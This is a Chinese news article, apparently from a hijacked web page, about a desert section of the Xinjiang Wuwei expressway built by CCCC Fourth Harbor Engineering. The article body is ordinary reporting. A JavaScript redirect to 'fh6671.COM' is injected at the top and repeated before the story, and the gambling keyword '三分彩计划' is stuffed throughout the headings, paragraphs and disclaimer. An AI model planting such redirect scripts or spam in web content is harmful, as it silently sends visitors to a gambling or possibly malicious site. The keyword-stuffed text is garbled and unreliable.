function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

三分彩计划【新疆】爱拼就会赢 中交四航局争当新疆乌尉高速公路建设排头兵

35团-若羌项目1标沥青下面层率先实现双幅贯通

2020-11-17 14:52:24 来源:中国交通新闻网 作者:肖明葵 张帮喜 张岱 金权培

function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl(); function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl(); 11月12日,中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段沥青下面层在全线率先实现双幅贯通,成为了乌尉高速公路全线施工进度最快的标段。该标段是由来自广东的中交四航局承建,这些南粤籍建设者不远万里来到世界第二大流动沙漠——塔克拉玛干沙漠腹地,面对沙暴、严寒、流动沙漠等恶劣施工条件重重困难,发挥敢闯敢干、务实创新的广东人精神,艰苦奋斗三度春秋,打赢了沙漠高速公路沥青下面层施工这一重大节点攻坚战,成为了全线建设的排头兵,为2021年新疆乌尉高速公路全线建成通车创造了有利条件。

通过卫星地图可以看到,在世界第二大流动沙漠塔克拉玛干沙漠的东部边缘,一条崭新平整的柏油路巍然成型。它笔直、宽阔,犹如一条游弋茫茫沙海的黑色“丝带”,穿越天山,贯穿大漠,飞越塔里木河,这便是由中国交建承建的新疆乌尉高速公路,一条新疆各族人民盼望和关注的民生路、幸福路、扶贫路。

三分彩计划“新疆乌尉高速公路贯穿天山南北,于2017年8月1日正式开工建设,总投资约761.57亿元,路线总长达1305公里。其中,由中交四航局承建的35团至若羌项目SRTJ-01标段,全长92.413km,是整个项目的‘硬骨头’之一” ,中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段项目经理谢强介绍。

沙漠施工 广东队伍争当排头兵

三分彩计划中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段贯穿世界第二大流动沙漠——塔克拉玛干大沙漠,五次穿越塔里木河,与山地、平原高速公施工相比,难度非常大,而且,随着四季更迭,还面临春季沙尘暴、夏季高温、秋季水浸路、冬季严寒等严峻挑战。

“工地上,最可怕的是沙暴,漫天黄沙铺天盖地,不但伸手不见五指,寸步难行,而且刚刚修好的路基,一阵风沙席卷,瞬间被黄沙吞没。”来自广东粤东山区的项目书记林清对沙暴的危害认识深刻,“之前只见过台风,从未见过沙暴,两者的破坏力都非常大。台风可以预警,但沙暴没有预报,我们吃了不少苦头,但没有被吓倒。”

三分彩计划面对恶劣的沙漠环境,一般人忍受不了风沙的肆虐,会选择离开,但中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段的员工,没有一个人打退堂鼓。“项目部人员80%来自广东,来到新疆气候干燥,温差高达70摄氏度,但大家依然选着继续坚守初心,为新疆沙漠地区人民在修筑一条通疆大道。”项目工程部长邓佳源自豪的说到。

三分彩计划“我们这支来自广东的建设者,经受住了西北沙漠地区夏季沙暴、冬季严寒等恶劣天气以及流动沙漠施工的种种考验,以及战胜了今年新冠疫情带来的不利影响,打赢了这场大漠筑通途的攻坚战、决胜战,成为了全线施工的排头兵,这是非常不容易的。”林清自豪地说。

敢拼敢赢 决胜进度攻坚战

三分彩计划“中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段穿越塔克拉玛干沙漠东部边缘,与塔里木河存在多处交叉,途中又有多处胡杨林,地理环境比较复杂,自然环境恶劣,施工用料只能靠外地拉运,最近拉运点都在200公里以外”,谢强说。为此,项目部提前谋划,协调了近400台(次)的车辆,将所需的物资及时储备。此外,针对后续工程工作面不连续等影响工程进度的情况,项目采取“见缝插针、多点开花”的措施,在施工过程中不断调整优化施工组织方案,积极主动地做好协调工作,为项目建设争取时间。

“摊铺沥青就要趁热,气温低于10℃不宜于沥青混合料摊铺,否则会影响道路的质量。为此,我们就开启了“五加二、白加黑”的连续作业模式,项目建设一天一个样,工程进展势如破竹……”项目总工陈永胜说。

在如此恶劣的环境下,在时间紧任务重的情况下,项目团队铆足了劲儿,提前完成了任务。截至目前,该标段是整个乌尉项目中施工进度最快的,并在总经理部针对日常管理、安全、环保检查专项考核中喜获“绿牌”奖励,受到了各方的一致好评。

绿色施工 民生环保两不误

三分彩计划中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段贯穿大漠,五次穿越塔里木河,而塔里木河流域胡杨遍布。为保护河流和胡杨生态,在设计阶段,中交建设者便为胡杨量身定制了保护路线,充分考虑胡杨的生长区域,8条施工便道不断优化设计,为胡杨让道,一绕就要多走4公里多。“我们修的不仅是一条穿越沙漠的“天路”,更是一条生态环保之路,一条新疆人民通往未来美好生活之路。”谈及生态保护工作,中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段项目党支部书记林清态度坚决地说道。

“今年,项目部按照“创新引领、绿色发展”的工作理念,狠抓环境保护工作,强化绿色施工,并安排专人负责道路施工作业的环境控制管理,建立危险废物台账,提高危险废物管理水平以及危险废物申报登记数据的准确性”,安全部部长黄廷介绍说。此外,项目还与库尔勒有资质单位签署危废处理协议,定期到项目部清运危险废物。

“我们在高速公路建设资金非常紧张的情况下,还专门拿出了专项的环保经费,保护了当地脆弱生态环境,这是我们央企义不容辞的责任”,林清说。

中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段全线约65公里,穿越塔克拉玛干沙漠。“这里常年刮大风,防沙治沙是工程重点,目前,我们已在高速公路两旁筑起草方格600万余平米,共计使用芦苇杆近万吨,有效的将流沙固定住了”,项目部副经理曾文说。“另外,那些深埋在沙土中的芦苇杆会随着时间的流逝慢慢腐烂,变成丰富的营养素和有机物,可以促进流沙中微生物的繁衍和成长,而伴随着微生物群落的加大,又进一步促进有机物的分解,为沙土中生长的各种植物提供更多、更营养的物质,从而形成一个良好的生态系统,使固沙的效果更加显著。”

严控疫情 为安全施工保驾护航

2020年注定是极为不平凡的一年,受新冠肺炎疫情影响,如何统筹做好疫情防控和复工复产,成为中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段所面临的一次大考。

今年年初和年中,项目所辖标段全部处于封城状态,复工复产面临着巨大的挑战,人员返岗难、防疫物资不足、材料供应紧张……种种难题接踵而至,项目主要班子成员成立了防疫领导小组,制定了《疫情防控防疫专项应急预案》,并因地制宜的采取了“三区”、“五统一”、“六步法”、“八到位”工作法,严格落实防控措施和要求,积极协调各方加快施工材料的复产复供,解决了项目建设物资供应问题。同时,项目党支部积极发挥战斗堡垒作用,第一时间部署、安排关键岗位的党员同志返岗,多渠道、多措施,为现场人员配置口罩等防护物品和洗手液等消杀用品……经过一系列的严格措施后,施工人员分批次有序返岗,有力保障了项目顺利进行。

中国交建新疆乌尉公路包PPP项目包括G0711线乌鲁木齐至尉犁三条线路五段公路,位于“新丝绸之路经济带"新疆境内核心区域。“目前,中国交建新疆乌尉公路包35团-若羌项目SRTJ-01标段正在全力推进中,该项目建成后,对于进一步完善国家高速公路网和新疆维吾尔自治区“6678”公路网战略布局,有力推进“一带一路”建设有重要的作用,将大大缩短新疆南北疆地区的“时空距离”,为新疆带来了源源不断的人流、物流、资金流、信息流……让南北疆各族群众“天涯若比邻不再是梦”,谢强说。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。